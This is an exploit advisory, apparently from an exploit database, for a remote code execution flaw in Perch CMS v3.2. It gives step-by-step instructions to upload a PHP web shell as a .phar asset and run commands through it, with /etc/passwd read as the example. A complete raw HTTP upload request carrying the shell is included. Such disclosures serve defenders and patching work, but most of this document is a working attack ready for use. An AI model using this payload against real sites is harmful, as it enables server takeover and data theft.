Headline
Perch 3.2 Remote Code Execution
Perch version 3.2 suffers from a remote code execution vulnerability.
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs: RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--